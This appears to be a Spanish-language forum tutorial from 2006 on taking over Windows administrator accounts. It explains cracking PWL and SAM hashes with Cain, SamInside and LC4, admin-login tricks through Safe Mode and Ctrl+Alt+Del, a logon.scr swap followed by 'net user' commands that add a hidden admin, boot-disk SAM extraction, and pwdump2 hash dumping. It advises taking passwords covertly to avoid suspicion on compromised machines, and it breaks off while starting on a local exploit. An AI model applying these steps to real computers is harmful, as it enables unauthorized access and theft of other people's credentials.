CONTRASEÑAS EN WINDOWS

« Respuesta #3 en: 11 Marzo 2006, 05:03 »

CONTRASEÑAS DE WINDOWS

En este apartado explicare la mayoria de las formas que se conocen hasta ahora para
sacar, borrar o crackear las contraseñas de los usuarios de windows (tambien
mencionare los posibles fallos de dichas tecnicas, que como todo mas de alguna lo
tendra), claro que me centrare en sacar la contraseña del administrador la cual nos da
poder casi absoluto sobre nuestro sistema o en su defecto del sistema que hemos
comprometido, asi de que espero se vayan preparando que este tema da para mas y mas
que nada para conocer nuevas tecnicas de las cuales quizas nunca escuchamos.

Como muchos ya sabemos, las contraseñas de windows se encuentran almacenadas en

el archivo SAM (esto es para los windows NT,XP y 2k) y en archivos PWL (en el caso
de los Win9x).
No tengo intencion en ponerme a explicar cada metodo para sacar las contraseñas de
win9x debido a la facilidad de ello asi como tambien a la inmensa cantidad de escritos
que existen por la internet que lo explican detalladamente y ademas cabe decir que hoy
en dia son muy pocas las computadoras que tienen instalado dicho sistema operativo,
pero en fin, solo a manera de repaso aquí va una forma de hacerlo...

CONTRASEÑAS EN WIN9X

Como ya mencione anteriormente las contraseñas son almacenadas en archivos .pwl

ubicados en dentro de la carpeta de windows, ¿pero que pasa si yo entro a dicha carpeta
y me encuentro con una infinidad de archivos pwl como por ejemplo pepito.pwl
papa.pwl mama.pwl etc etc?
Todos esos archivos son validos, lo que ocurre es que windows guarda las contraseñas
de cada usuario en archivos individuales con el nombre de usuario seguido de la
terminacion .pwl, solo que hay que tener en cuenta varios conceptos.
Anteriormente windows 9x se instalaba sobre particiones del tipo FAT32 y no sobre
NTFS, si quieren saber que sistema de archivos tienen instalado en su computadora
basta con que entren a “mi pc” y den clic derecho sobre su disco duro o unidad c: y
después clic en el menú propiedades y a continuación les mostrara una ventana de este
tipo:

La cual nos muestra en la parte superior sistema de archivos que en mi caso es NTFS.

Como muchos ya sabran las diferencias entre tener una particion FAT32 y una NTFS es
la estructura con la cual nuestro disco duro almacena e indexa los datos(seria bastante
conveniente que buscaran un poco de informacion al respecto sobre sistemas de
archivos FAT32, NTFS, EXT2, etc) y una diferencia muy notable al momento de tener
particiones de este tipo es que si existe un archivo con un nombre muy largo lo que hace
es cortarlo para dejarlo solamente con 8 digitos, por lo tanto si existe un usuario con el
nombre de administrador, nunca nos vamos a encontrar un archivo administrador.pwl
sino que sera admini~1.pwl por lo tanto ya saben cual es el que tienen que copiar a su
diskette.
La seguridad de win9x es tan admirable que si intentan copiar esos archivos mientras el
sistema operativo este corriendo y ademas estan en una cuenta restringida simplemente
SI los va a dejar copiarlos xD, cosa contraria a Windows XP, NT, 2k, asi de que no
corren ningun riesgo al intentar sacarlos de la computadora para llevarselos a su casa y
jugar con ellos un rato.
Ahora que ya tenemos el archivo pwl nos hace falta sacarles la contraseña ¿Cómo?
Simplemente tomamos nuestro crackeador de pwl’s favorito, en mi caso voy a utilizar
Cain (es bastante bueno este programa lo pueden descargar de www.oxid.it no sera la
primera vez que lo mencione).
Abrimos Cain y nos desplazamos hasta la pestaña de cracker, una vez alli en el apartado
que se encuentra a nuestra izquierda seleccionamos PWL files, ahora nos vamos al
menú File y damos clic donde dice “Add to list” una vez hecho esto nos aparecera una
ventana que nos pedira la ubicación de nuestro archivo pwl, solo es cuestion de buscarlo
y presionar abrir.
Ahora que ya nos aparecio en nuestro programa del Cain solo tenemos que dar clic
derecho sobre el y elegir la opcion de crackeo que mas nos guste por ejemplo
Dictionary Attack o Brute-Force Attack (recomiendo mas la segunda aunque en veces
es un poco mas tardado), y ahora si solo nos falta esperar y obtendremos su password en
texto plano en la parte derecha.

Como pudieron observar romper la seguridad de un Win9x es bastante facil y no

implica problema alguno.

CONTRASEÑAS EN WINDOWS 2K,NT Y XP

ACCESO LOCAL

Como veremos en esta parte, existen bastantes metodos para obtener la contraseña del
administrador de manera local, no me pondre a explicar todos los metodos existentes
porque nunca voy a terminar con esto.
Antes de comenzar solo decir que existe una copia de respaldo de los archivos que
contienen las contraseñas dentro de C:\Windows\Repair pero de nada nos serviran si
nuestro administrador ya ha cambiado su contraseña(pero uno nunca sabe que tan
despistados son nuestros administradores asi de que no esta por demas que primero les
hechen un ojo a ver que sacan de alli).
 
ENTRAR EN MODO A PRUEBA DE FALLOS O MODO SEGURO

En lugar explicar este metodo como algo 100% efectivo, mejor voy a explicar en que se
basa su funcionamento y por que no siempre es funcionable, a pesar de que en muchos
foros he visto que explican este metodo como algo que siempre les va a funcionar esta
vez me toco a mi desmentir este mito.

Para nuestro ejemplo vamos a utilizar un equipo el cual solo nos deja entrar como
invitados, (logico que no podemos instalar nada).

En realidad existen dos metodos de efectuar esta operación:

El primer metodo consiste en reiniciar el equipo y justo antes de que nos salga la
pantalla de Windows XP (eso es cuando aun estamos en la pantalla negra que es cuando
termina de detectar nuestro hardware y empieza a cargar el sistema) presionamos la
tecla F8 y nos aparecera un menú con varias opciones entre las cuales hay una que dice
Modo Seguro (si no mal recuerdo en un windows 2000 dice Modo a prueba de fallos),
una vez seleccionada esa opcion presionamos enter y esperamos hasta que aparezca la
pantalla de Bienvenida, pero tremenda sorpresa nos llevamos cuando observamos que
aparece otro nuevo usuario que no nos aparecia con anterioridad llamado Administrador
damos un clic en ese nuevo usuario y Wala!!!!! Nos deja entrar sin pedirnos contraseña
alguna y lo mejor de todo es que ahora no tenemos restricción alguna para cambiarle la
contraseña a cualquier otro usuario, ya de aquí en delante solo queda a su imaginación
lo que quieran hacer ya pueden entrar al panel de control y en la opcion de Cuentas de
Usuario podemos crear inclusive un nuevo usuario con privilegios de administrador
para lo podamos usar sin ningun problema al momento de iniciar Windows.

El segundo metodo es un poco mas sencillo, primero tenemos que iniciar nuestra
computadora normalmente sin dar clic a F8 ni nada por el estilo.
En la pantalla de Bienvenida cuando nos aparecen los usuarios y debemos de dar clic a
nuestra cuenta de invitado, en lugar de hacerlo presionamos la tecla Ctrl seguido de la
tecla Alt y por ultimo sin soltar estas dos presionamos la tecla suprimir, después de eso
soltamos las tres teclas y las presionamos nuevamente (en algunos teclados no aparece
como suprimir sino como Delete).
Si presionaron las tres teclas dos veces continuas correctamente les debera de cambiar el
aspecto de la pantalla con lo cual ya no les aparecen los usuarios de ese equipo y ahora
solo hay una ventana que les pide un usuario y una contraseña, en la cual vamos a poner
como nombre de usuario administrador (si esta en ingles su Windows deberan poner
administrator) y en el espacio donde les pide la contraseña la dejan en blanco para
después dar un clic en aceptar y wala! Ya los dejo entrar como todo un administrador s
Windows.

Hay veces que en este segundo metodo les aparece una ventana diciendoles que existe
una restricción para su cuenta de usuario y por lo tanto tendran que hacerlo reiniciando
y entrando en modo seguro, esta restricción me ha tocado verla bastantes veces en
equipos nuevos de la marca HP, claro que siempre y cuando nunca hayan formateado su
equipo.

CONRAMEDIDAS PARA ESTE METODO

Pues si ha muchos de ustedes les ha funcionado este metodo me diran que no las tiene
pero a mas de alguno no le funciono y les pidio tambien contraseña y quisiera
imaginarme que les gustaria saber la razon por la cual no funciono a menos que sean
unos script kiddies que nomas quieren joder a los demas y no entender de razones y por
lo tanto no leeran estos parrafos.

En realidad este usuario misterioso que aparecio de la nada al momento de entrar en

modo seguro y que se llamaba administrador, no es mas que el “verdadero
administrador de Windows”.
¿Qué quiero decir con esto?
Si ustedes son usuarios que ya han formateado su computadora con Windows XP y han
puesto atención a las letras que les aparecen en cada ventana que requiere su
intervención sabran que justo después de que Windows les pide el numero de su licencia
para registrarlo, la ventana siguiente les pide en la parte inferior una contraseña para el
administrador que en este caso es ese administrador que nos aparecio.
Asi de que si el dueño de esa computadora o la persona que se encargo de instalar
Windows XP se preocupa un poco mas por la seguridad del equipo seguramente le
coloco contraseña desde el momento de instalar Windows y es por eso que al momento
de entrar en modo Seguro les pidio contraseña y no pudieron entrar.
Con esta explicación me imagino que ya sabran que este metodo no es nada fiable.

 
CONTROL USERPASSWORDS2

Este es otro metodo que me ha tocado ver por Internet y el cual afirman que es 100%
fiable veamos que pasa.

Lo que tenemos que hacer es entrar a Windows con nuestra sesion.

Una vez dentro damos clic en inicio – ejecutar – y tecleamos control userpasswords2 y
veremos como se abre una ventana de este tipo:

Aquí lo unico que tenemos que hacer es seleccionar el usuario administrador y dar un
clic en el boton “Restablecer contraseña…”, de este modo nos pedira que coloquemos
una nueva contraseña con lo cual pondremos la que mas nos guste y ya podremos entrar
sin mas ni mas a la maravillosa cuenta de administrador.

CONTRAMEDIDAS PARA ESTE METODO

Como suele suceder fue demasiado facil para ser verdad ¿no creen?.
Cabe decir que para poder ejecutar este comando con toda facilidad, el usuario con el
cual lo hagan debera de contar con privilegios de administrador, por lo tanto desde la
cuenta de invitado ¡NO LO PODRAN HACER!.
La verdad es que este metodo no tiene mas merito debido a que si podemos ejecutarlo
entonces podemos hacer cualquier cosa en la computadora.

 
POR MEDIO DEL PROTECTOR DE PANTALLA

Este truco tambien me ha tocado verlo bastantes veces, veamos lo sencillo que es
ejecutarlo.

Antes que nada entramos a Windows, ya una vez iniciada nuestra sesion entramos con
el explorador de Windows hasta la carpeta C:\Windows\system32 (Recuerden que en
W2000 seria WINNT en lugar de Windows), ya una vez dentro lo que vamos a hacer es
mover el archivo Logon.scr a cualquier otro lugar, y vamos a hacer una copia de nuestro
archivo cmd.exe ubicado en esa misma carpeta y lo vamos a pegar alli mismo solo que
en lugar de dejarle el nombre de “Copia de cmd.exe” se la vamos a cambiar por
Logon.scr, recuerden que por defecto Windows no nos deja ver las extensiones de
nuestros archivos por lo tanto vamos a requerir habilitarlas.
Nos vamos al menú Herrmientas – Opciones de Carpeta y en la ventana que nos
aparecio le damos clic a la pestaña ver, una vez alli nos desplazamos casi hasta el final y
econtraremos una opcion que dice “Ocultar las extensiones de archivo para tipo de
archivo conocido” la cual se encuentra seleccionada por defecto asi de que la vamos a
des-seleccionar y damos clic en aceptar.
Ahora si ya podemos renombrar nuestro archivo a logon.scr sin ningun problema.
Solo nos resta esperar a que se active el protector de pantalla y en lugar de aparecer
nuestro protector favorito, nos aparecera una shell de nuestro sistema operativo
(recuerden que cmd.exe es tambien conocido como shell del sistema) y ahora si
podremos agregar un nuevo usuario con privilegios de administrador, o agregarnos a
nosotros mismos al grupo de administradores, solo basta con ejecutar:
Para agregar un usuario llamado zhyzura con contraseña kaka seria:
Código:
net user zhyzura kaka /add

Para agregar el usuario zhyzura al grupo de administradores seria:

Código:
net localgroup administradores zhyzura /add

Y listo ahora ya tenemos un nuevo usuario llamado zhyzura en el grupo de los

administradores, solo nos hace falta cerrar nuestra sesion actual y después entrar en la
que acabamos de crear.

CONTRAMEDIDAS PARA ESTE METODO

Cabe decir que este metodo a mi nunca me funciono, las pruebas las he realizado en
Windows XP, Windows XP Service Pack 1 y Service Pack 2 ademas de tambien
realizarlas en un Windows 2000 Profesional SP0, todos ellos con las particiones en
NTFS.
Al momento de entrar a cualquiera de ellos con una cuenta restringida no permite
borrar, eliminar o sobrescribir archivos ubicados en system32, la unica manera en la que
se pueden renombrar satisfactoriamente y colocarlos dentro de system32 es  entrando
con la cuenta de administrador y aun asi inmediatamente sale una pantalla de
advertencia pidiendo el disco de Windows XP por que detecta que archivos del sistema
se han dañado.

Quizas ahora muchos mas de ustedes me digan que en realidad no era esperando a que
iniciara el protector de pantalla sino que deberia de reiniciar el ordenador para que en
lugar de aparecerme el login me aparezca una shell del sistema y desde alli agregarme al
grupo de administradores. Cabe decir que esto tambien lo intente tanto en Windows
2000 como en XP Sp2 y no funciono.

 
SAMINSIDE
Antes de continuar quiero agregar otros conceptos muy importantes a tener en cuenta al
momento de querer crackear la contraseña de un Windows NT, 2k y XP.

Como ya sabemos el archivo SAM ubicado en

Citar
C:\Windows\system32\Config
es el encargado de almacenar las contraseñas de nuestros usuarios, pero resulta de que
Microsoft quiso hacernos la vida un poco mas difícil y creo una utilidad llamada syskey,
la cual brinda proteccion extra a nuestras contraseñas.
Una forma de habilitar esta proteccion es presionando inicio – ejecutar – y tecleando
“syskey”, de esta forma nos aparecera una ventana para activar dicha opcion.
Si nuestro equipo tiene habilitada dicha opcion, para poder sacar la contraseña del
administrador no nos bastara con solo sacar el archivo SAM sino que tambien
tendremos que obtener el archivo system ubicado en la misma carpeta, en caso de no
estar esta proteccion habilitada solo necesitaremos el archivo SAM y podemos utilizar
casi cualquier crackeador como por ejemplo Cain o L0phtCrack.
Ahora para terminar de amargarles el dia les voy a decir que esta opcion viene
habilitada por defecto en Windows XP y a partir del Sp4 de Win 2000 tambien la
encontraran habilitada por defecto.

Toca turno a esta poderosa herramienta que nos permitira dumpear las hashes de todos
los usuarios para después crackearlos comodamente tanto con este mismo programa o
pasarlos al L0phtCrack, LC4, LC5, o el que quieran SIN IMPORTAR QUE ESTEN
FORTALECIDAS LAS CONTRASEÑAS CON SYSKEY.
Veamos que sencillo es hacerlo.

Primero a conseguirlo se ha dicho (ya saben google es la solucion), ya una vez que lo
tengamos en nuestras manos procedmos a ejecutarlo, lo mejor de todo es que no
necesita instalacion.
En la ventana que nos aparecera deberemos de dar clic en el siguiente boton para que
nos aparezca un menú:

En el menú que nos aparecera seleccionamos la opcion que mas les guste ya que ambas
funcionaran por igual y veremos como automaticamente nos apareceran todos los
usuarios que tengan una cuenta en nuestro equipo:

Algo que me encanta de este programa es que si existe un usuario con un password
bastante debil, automáticamente nos aparecera su contraseña sin necesidad de crackearla
ademas de que tambien nos muestra la longitud de las contraseñas que contiene cada
usuario (cada símbolo ? representa un carácter), de esta forma si existen varias cuentas
con privilegios de administrador lo mejor sera que nos vayamos por la mas corta (que
no necesariamente es la mas facil, pero casi siempre asi ocurre).

Ahora solo deberemos de seleccionar con una palomita los usuarios a los que les
queramos crackear su contraseña, una vez hecho esto solo seleccionamos las opciones
de crackeo que mas nos gusten dando clic en el siguiente boton:

Después presionamos F5 y a esperar se ha dicho.

CONTRAMEDIDAS PARA ESTE METODO

Pues este metodo les tengo dos noticias una buena y una mala.
La buena es que saminside utiliza un metodo que es conocido como inyeccion dll( me
refiero sobre todo a la opcion que dice “import from local machine using LSASS”) y
mientras este metodo siga funcionando en Windows siempre se podra utilizar sin ningun
inconveniente.
La mala es que para poder utilizar cualquiera de estos dos comandos se requieren
privilegios de administrador al momento de utilizarlo.
 
DATAPOL CIA COMMANDER

Este metodo seguro ya es conocido por muchos de ustedes pero quizas son pocos los
que lo han puesto en practica.

Lo primero que tenemos que hacer es conseguir el programa, aquí esta su web oficial:

http://www.datapol.de/en/index.htm

o tambien pueden buscarlo en su cliente P2P favorito.

Ahora que ya tenemos el programa lo instalamos y ejecutamos, con lo cual nos creara
una carpeta nueva con el nombre de CIA Recovery Floppy GUI Setup a la cual
entramos y ejecutamos su contenido para que después se abra una ventana como la
siguiente, solo es cuestion de colocar un diskette dentro de la unidad A: y
automáticamente lo creara.

Muy bien, ahora que ya tenemos nuestro diskette de inicio del CIA Commander vamos
a ponernos manos a la obra.

Voy a explicar dos formas de utilizar este programa para nuestros fines, una forma sera
simplemente eliminar la contraseña del administrador y de este modo entraremos sin
necesidad de saber la contraseña y el otro metodo sera obtener la contraseña.

Eliminar o cambiar la contraseña del administrador

Como ya se menciono con anterioridad, el CIA Commander lo que hace es crear un
diskette de inicio y para poderlo hacer funcionar tendremos que reiniciar la
computadora y en lugar de que comience a cargar el sistema operativo desde el disco
duro, le tenemos que indicar a la computadora que primero busque un sistema operativo
en otras unidades.

¿Cómo hacemos esto?

Primero tendremos que entrar a la BIOS de nuestra computadora, para ello vamos a
reiniciar la computadora y poner atención a la primer pantalla que nos aparece en
nuestra computadora y presionar la tecla que alli nos indique para entrar a Setup,
generalmente esa tecla es la tecla Suprimir, F2 o F10, todo depende de la tarjeta madre
que tengamos instalada.

Si presionamos la tecla correcta nos debera  de abrir una pantalla de este tipo:

Una vez alli, en mi caso me desplazo hasta la pestaña BOOT, y alli modifico la
prioridad con que se arrancara mi computadora para primero lo haga desde las unidades
extraíbles o desde el floppy, con lo cual quedaria algo asi:

Ahora solo es cuestion de Guardar los cambios y salir.

Si tu BIOS no es parecida a esta, no te preocupes, todas las BIOS tienen la opcion de

modificar la prioridad de arranque, generalmente se encuentra en la parte de Opciones
avanzadas, y alli solo es cuestion de buscar una opcion que mencione, Priority Boot o
First Boot, para después modificarla y dejar en primer lugar la opcion que diga Floppy o
A:.

Ahora si no debera de haber ningun problema al arrancar nuestra computadora y debera

de iniciar el programa del CIA Commander con la siguiente pantalla, la cual nos
pregunta en que partición se encuentra nuestro Sistema Operativo:

En mi caso no hay ningun problema y solo me muestra una sola partición a lo cual
presiono Enter, si te aparecen varias opciones en esta pantalla solo recuerda que
generalmente la primer partición es la que se le asigna a nuestro sistema operativo y las
demas comúnmente son utilizadas para guardar nuestros archivos o instalar otros
sistemas operativos.

La siguiente ventana que nos aparecera nos mostrara un cuadro como el siguiente, en el
cual eligiremos la opcion de User Manager:
Una vez elegida dicha opcion nos aparecera la siguiente ventana:

Como pueden observar lo que ahora nos pide es que seleccionemos el directorio el cual
utiliza nuestro sistema operativo, asi de que ya saben que tienen que seleccionar el que
diga WINDOWS o WINNT y presionar la tecla de espacio.

Si seleccionamos el directorio correcto nos debera de aparecer lo siguiente:

En la parte superior izquierda nos muestra la lista de usuarios que tiene nuestro sistema
operativo, al momento de que seleccionemos a cada usuario (solo es cuestion de
seleccionarlo con las teclas de direccion y presionar enter) en el cuadro verde nos
indicara si tiene algun password (contraseña) que lo este protegiendo.

Y ahora ¿Cómo le quitamos la contraseña?

Si fueron observadores abran notado que en la parte inferior, para ser exactos en esta
seccion:

Cada una de estas opciones con numeros en realidad se refieren a las teclas F1, F2, F3…
F10.
Y como veran la tercer opcion que dice Chg Pwd, se refiere a cambiar la contraseña del
administrador asi de que solo basta con que presionemos la tecla F3 y lo siguiente que
nos preguntara sera la nueva contraseña que queramos ponerle, una vez cambiada
presionamos F10 para salir de esas opciones y volver a nuestro menú principal y si ya
no se nos olvido nada entonces elegimos reboot y sacamos nuestro diskette para que al
reiniciar ya no volvamos a entrar con el CIA Commander.

Quizas en este punto ya muchos de ustedes sabran quitar la contraseña de cualquier

usuario pero esto tambien tiene sus desventajas, ya que si nosotros somos los únicos
usuarios de un determinado equipo y el administrador de nuestra red se da cuenta de que
su contraseña a sido eliminada lo mas seguro es que nos metamos en  graves problemas,
por lo tanto yo recomiendo que en lugar de remover la contraseña del administrador lo
mejor sera que la Obtengamos, para ello vamos a utilizar un segundo metodo con el
CIA Commander y otra herramienta adicional.

Obtener la contraseña del administrador con CIA Commander y SamInside

En este punto voy a volver a repetir lo que dije unas hojas mas arriba, por que casi estoy
seguro que la mayoria no esta leyendo completo este escrito:
Citar
Como ya sabemos el archivo SAM ubicado en C:\Windows\system32\Config es el
encargado de almacenar las contraseñas de nuestros usuarios, pero resulta de que
Microsoft quiso hacernos la vida un poco mas difícil y creo una utilidad llamada syskey,
la cual brinda proteccion extra a nuestras contraseñas.
Una forma de habilitar esta proteccion es presionando inicio – ejecutar – y tecleando
“syskey”, de esta forma nos aparecera una ventana para activar dicha opcion.
Si nuestro equipo tiene habilitada dicha opcion, para poder sacar la contraseña del
administrador no nos bastara con solo sacar el archivo SAM sino que tambien
tendremos que obtener el archivo system ubicado en la misma carpeta, en caso de no
estar esta proteccion habilitada solo necesitaremos el archivo SAM y podemos utilizar
casi cualquier crackeador como por ejemplo Cain o L0phtCrack.

Para nuestro fin necesitamos seguir todos los pasos mencionados con anterioridad solo
que en lugar de elegir la opcion User Manager, esta vez utilizaremos la opcion de File
Manager.
Ahora nos aparecera la siguiente ventana (para desplazarnos entre ambas ventanas
presionamos la tecla TAB y para desplazarnos entre las carpetas basta con que
presionemos enter en cada una de ellas):

Lo que aquí nos interesa es sacar el archivo SAM ubicado en:

C:\Windows\System32\Config
Asi de que ya sabemos hasta donde tenemos que ir, una vez alli lo que haremos sera
seleccionar el archivo SAM y presionar F5, de este modo nos pedira la ubicación de
destino, por defecto esta la unidad A:, solo que si queremos tanto el archivo SAM y
system yo recomiendo primero copiarlos a otro lugar por ejemplo C: y después de eso
entrar a Windows y sacarlos grabandolos en disco o con una memory flash, por el hecho
de que el archivo system tiene un tamaño superior a 3 megas y dudo que encuentren un
diskette que tenga dicha capacidad a menos que lo compriman (hay que tomar en cuenta
que algunas opciones del CIA Commander solo estan funcionables en la version de
paga).

Ahora que tenemos ambos archivos en nuestro poder vamos a abrir el programa
SamInside que por cierto “no requiere instalacion” asi de que lo podremos hacer con
nuestra fabulosa cuenta de usuario restringido.

Una vez ejecutado SamInside nos mostrara una ventana de este tipo:

Ahora damos un clic en la parte que esta encerrada en circulo rojo y seleccionamos la
opcion “Import from SAM and SYSTEM files…”, ahora tenemos que buscar los
archivos de donde los hayamos copiado, si seleccionamos primero el archivo SAM y las
contraseñas estan protegidas con syskey lo mas seguro es que a continuación nos pida el
archivo system, en mi caso existia un usuario llamado Particular con una contraseña
bastante facil de crackear y por ello automáticamente me saco la contraseña:
De aquí tambien podemos observar que el administrador tiene una contraseña de 10
cifras, espero y no sea algo difícil por que en caso de serlo esto nos va a llevar bastante
tiempo.
Como nada mas me interesa la contraseña del administrador, sera este el unico que
dejare seleccionado. Para ver las opciones de crackeo daremos un clic a la flecha
encerrada de color azul y después seleccionaremos las que mas sean de nuestro agrado,
en mi caso lo hare por fuerza bruta (lo que hace es ir generando palabras hasta dar con
la correcta), es un metodo bastante mas lento pero a su vez mas efectivo.
Presionamos F5 y es momento de esperar los resultados:

Como podran observar la contraseña estaba conformada solo por letras de alli que no
tardara tanto en obtenerla.

CONTRAMEDIDAS PARA ESTE METODO

Pues como observaron en este ejemplo, el metodo de obtener la contraseña de esta

forma es bastante efectiva, solo que como todo esto tambien tiene sus limitaciones,
ademas de lo tardado que podria ser sacar una contraseña bastante larga tampoco les
podra funcionar este metodo si la partición de su Windows esta sobre un sistema de
archivos FAT32 en lugar de NTFS.

 
NTFSDOS

Esta es otra gran herramienta que nos ayuda a reparar daños en nuestro sistema
operativo, por ejemplo cuando se han corrompido archivos primordiales de nuestro
sistema o tambien puede ser utilizado para rescatar información primordial en caso de
que nuestro sistema operativo ya no arranque correctamente.
Al igual que el CIA Commander, tambien es 100% funcionable sobre sistemas
XP,2000,NT y 2003.
La forma en que funciona es sencilla, primero tenemos que arrancar nuestra
computadora con cualquier disco de inicio de msdos (preferentemente arriba de la
version 5.0) y después utilizar el disco de NTFSDOS para montar nuestra partición
NTFS para poder escribir sobre ella sin ningun problema.
Muchos de ustedes ya abran notado mas de alguna vez que si tienen en una misma
computadora dos sistemas operativos, por ejemplo Windows 98 y ademas Windows XP,
sabran que Windows 98 no nos detecta la partición en la que se ubica nuestro Windows
XP, y en el caso de entrar a XP, este ultimo no tiene ningun problema para acceder a
nuestro segundo sistema operativo.
De forma sencilla NTFSDOS nos permite acceder desde msdos a particiones NTFS en
manera total y sin restricción alguna.
Muy bien, muy bien, ahora si ya sabemos como funciona asi de que es momento de
ponernos manos a la obra.

Lo pueden descrgar directamente desde aquí:

http://www.sysinternals.com/Files/NtfsDos.zip

Si no funciona el link, recuerden que siempre esta google para asistirnos en nuestra
ayuda.
Una vez descargado pasamos los archivos a nuestro diskette y listo.

Primero tenemos que arrancar nuestra computadora con un disco de inicio de msdos,
pueden utilizar tambien un disco de inicio de Windows 98.

Una vez hayamos reiniciado nuestra computadora y nos haya dejado en el promp (A:\
>), es entonces cuando insertamos nuestro segundo diskette con la utilidad y ejecutamos
NTFSDOS asi una vez montada la partición solo es cosa de copiar y pegar los archivos.

CONTRAMEDIDAS PARA ESTE METODO

Como pueden comprobar la unica contramedida a este metodo es teniendo una

contraseña lo bastante compleja como para ser crackeada rapidamente, de esta forma lo
mas seguro es que el atacante termine desesperándose y prefiera buscar otro metodo.
 
PWDUMP2

Esta es la version mas reciente de pwdump, hecha por Todd Sabin y a diferencia de su
antecesor esta herramienta es capaz de burlar el cifrado syskey.

La forma en que lo hace es muy simple, básicamente utiliza una tecnica llamada
inyeccion DLL para cargar su propio codigo en un proceso que sea lo suficientemente
privilegiado (en este caso utiliza LSASS) para realizar una llamada API interna que
logre acceder a las contraseñas cifradas por syskey, sin necesidad de descifrarlas.

Su forma de uso es muy sencilla, solo basta con que ejecutemos:

Código:
C:\> pwdump2 PID_LSASS >> pass.txt

De esta forma nos almacenara los hashes de todos los usuarios en un archive de texto
llamado pass.txt.
Pero… ¿Qué es eso de PID_LSASS?
El PID no es otra cosa que un simple identificador de proceso, para saber cual es en
nuestra computadora, pueden hacerlo de varias formas:
-   Abrir el adminisrador de tareas (Ctrl – ALT  - SUPR), de alli desplazarse hasta Ver >
Seleccionar columnas. Y seleccionar “Identificador de proceso (PID)”.
-   Entrar a Inicio > ejecutar > cmd > y teclear tasklist. De esta forma les mostrara todos
los procesos de su CPU con su respectivo PID en la parte izquierda.
Ahora que ya sabemos el PID del proceso solo basta con que ejecutemos (esto es en mi
caso):

Código:
C:\> pwdump2 772 >> pass.txt

Y listo ya tenemos los hashes de todos los usuarios de nuestra computadora, si

observamos el archivo de texto pass.txt ubicado en la misma carpeta de pwdump2
podremos darnos cuenta de que los coloca de una forma muy parecida al archivo
/etc/passwd que almacena las contraseñas en GNU/Linux.

Ahora ha llegado el momento de crackearlos, para esto pueden utilizar varias

herramientas como por ejemplo saminside, L0phtCrack, LC4, LC5 (esta es la version
mas reciente de L0phtCrack), etc.

En mi caso lo voy a hacer con LC4 que es el que tengo instalado, al momento de abrirlo
se nos presenta un pequeño asistente (como no me gustan a mi prefiero cerrarlo), ya una
vez dentro lo que haremos sera iniciar una sesion (File > New session…), ahora
tenemos que importar nuestro archivo de texto mediante el menú import > import from
PWDUMP file…

Muy bien ahora que ya esta cargado lo que haremos sera modificar la forma en la que
realizaremos crackeo mediante Session > Session options, alli se nos mostrara una
ventana de este tipo:

Como veran existen 3 metodos: Dictionary Crack, Dictionary/Brute Irbid Crack y Brute
Force Crack.
El primer metodo lo que hara sera ir comparando los hashes de las palabras que
contengamos en nuestro diccionario hasta dar conla correcta (si buscan un poco por
google encontraran muy buenos diccionarios de palabras, me ha tocado ver de hasta 40
megas).
La segunda seria una mezcla del diccionario con bruta fuerza ya que agrega a las
palabras de nuestro diccionario una o mas letras adicionales tipo jose12.
El tercero ya conocido por todos ustedes lo que hace es ir generando palabras hasta dar
con la correcta con todos los caracteres que nosotros le indiquemos.

Entonces seleccionamos a nuestro gusto y presionamos OK.

Para comenzar el ataque basta con que presionemos F4 y dependiendo de la
complejidad de la contraseña sera el tiempo que tardara en obtenerla, si no alcanzamos a
sacarla y no queremos perder lo que llevamos de avanzado basta con que guardemos la
sesion para su uso posterior.

CONTRAMEDIDAS PARA ESTE METODO

Pues si esto se escucho bastante sencillo, es por que uno de los requisitos para poder
utilizar pwdump2 es tener privilegios de administrador, en pocas palabras si estan en
una cuenta limitada no lo podran utilizar correctamente.
El unico uso que yo le he dado es por ejemplo cuando ya soy administrador en un
equipo que tiene varios usuarios, lo utilizo para sacar sus contraseñas sin necesidad de
borrarselas para asi evitar posibles sospechas.

PWDUMPX
Cabe decir que no solamente existe pwdump2 sino que tambien existe pwdump3 y
pwdump4, pero siguen teniendo la misma limitante la cual consiste en tener privilegios
de administrador en el equipo que se desee atacar por lo tanto creo que es mejor seguir
avanzando con otros metodos.
Con esto no quiero decir que pwdump no sirva y que nunca lo deban de usar, pero al
menos en mi caso tengo otros metodos que me gustan mas.

 
UTILIZANDO EXPLOITS

Explicar el completo funcionamiento de los exploits y como es que actuan en realidad

nos llevaria bastantes paginas (mejor dicho un libro completo o mas), si les interesa
aprender sobre ellos mas a fondo visiten el siguiente enlace seguro les gustara leer todo
lo que alli se encuentra:
http://foro.elhacker.net/index.php/board,32.0.html

Este uno de los metodos que mas frecuentemente utilizo y quizas de los que menos se
escucha hablar al menos para los fines que en estos momentos estamos buscando.

La forma de uso es bastante sencilla, lo unico que tenemos que hacer es buscar
vulnerabilidades de forma local para después buscar un exploit que nos de shell al
explotar la vulnerabilidad.
Nota: Cabe decir que no todos los exploits nos daran shell sino que tambien pueden
provocar una caida del sistema y en este caso no queremos que esto ocurra(esto se como
se conoce como DOS).

Una forma de averiguar si es vulnerable es utilizando un escaner de vulnerabilidades,

pero como no siempre podemos instalar programas para hacernos una autoprueba
ocuparemso de la ayuda de scaners que no requieran instalacion, para ello es bueno que
visitemos a menudo la pagina del grupo eeye los cuales muchas de las veces sacan un
escaner que te dice si un equipo es vulnerable a un bug en especifico.
www.eeye.com

Otra forma bastante sencilla de saber cuales parches tiene instalado nuestro sistema
operativo es desplazandonos hasta la opcion de “agregar o quitar programas” dentro del
“panel de control”. Alli nos mostrara todas las actualizaciones que hayan sido
instaladas.
Quizas muchos digan, “yo nunca he instalado una sola actualizacion, ¿entonces puedo
utilizar cualquier exploit?”
La respuesta es no, ya que muchas veces si se formatea una computadora no quiere
decir que no tenga ningun parche instalado, recuerden que se pueden crear discos de
instalacion de XP con varios Service Pack incluidos (un Service Pack seria un mega
parche que incluye bastantes actualizaciones que te protegen de amenazas de este tipo,
Ah! y como olvidarlo, tambien te hacen tu computadora mas lenta y te quitan espacio
del disco duro).

Otra forma de ver hasta que Service Pack tenemos instalado en nuestra computadora es
dando clic derecho sobre de Mi PC y después en propiedades, asi nos mostrara una
ventana de este tipo:

En mi caso no tengo ningun Service Pack instalado, si lo tuviera me aparecerian unas

letras indicandolo justo en el lugar donde esta el circulo rojo, y como ya revise en
“agregar o quitar programas” de que tampoco tuviese ninguna actualizacion proceso a
utilizar el primer exploit que se me venga a la mente y que ademas me de una shell, en
este caso utilizare el exploit que ataca la vulnerabilidad MS03-026, para mayor
información de dicho fallo lean el siguiente enlace:
http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-
026.asp
No sean lammers y visiten el link, no es tan difícil leer lo que alli dice ademas asi
